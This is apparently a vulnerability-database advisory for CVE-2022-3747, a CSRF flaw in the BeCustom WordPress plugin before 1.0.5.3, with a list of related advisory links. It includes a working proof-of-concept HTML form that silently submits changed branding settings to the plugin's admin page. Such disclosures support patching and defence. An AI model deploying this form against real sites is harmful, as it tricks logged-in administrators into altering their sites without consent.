Lucene search
WpvulndbWPEX-ID:515ED4D4-0313-4F35-B4C2-8813F688E2EAHistoryNov 14, 2022 - 12:00 a.m.
Becustom < 1.0.5.3 - Settings Update via CSRF
2022-11-1400:00:00
wpvulndb
119
csrf bypass
settings update
form submission
security exploit
cross-site request forgery
0.001 Low
EPSS
Percentile
41.5%
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=be_custom_branding" method="POST">
<input type="hidden" name="betheme_label" value="" />
<input type="hidden" name="betheme_url_slug" value="" />
<input type="hidden" name="replaced_logo_url" value="" />
<input type="hidden" name="replaced_theme_image" value="" />
<input type="hidden" name="replaced_theme_desc" value="" />
<input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" />
<input type="hidden" name="submit" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
wpvulndb
wpvulndb
Becustom < 1.0.5.3 - Settings Update via CSRF
2022-11-14 00:00:00
cve
cve
CVE-2022-3747
2022-11-29 21:15:11
cvelist
cvelist
CVE-2022-3747
2022-11-29 20:41:02
zdt
zdt
WordPress BeTheme BeCustom 1.0.5.2 Cross Site Request Forgery Vulnerability
2022-11-16 00:00:00
packetstorm
packetstorm
WordPress BeTheme BeCustom 1.0.5.2 Cross Site Request Forgery
2022-11-15 00:00:00
nvd
nvd
CVE-2022-3747
2022-11-29 21:15:11
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2022-11-29 21:15:00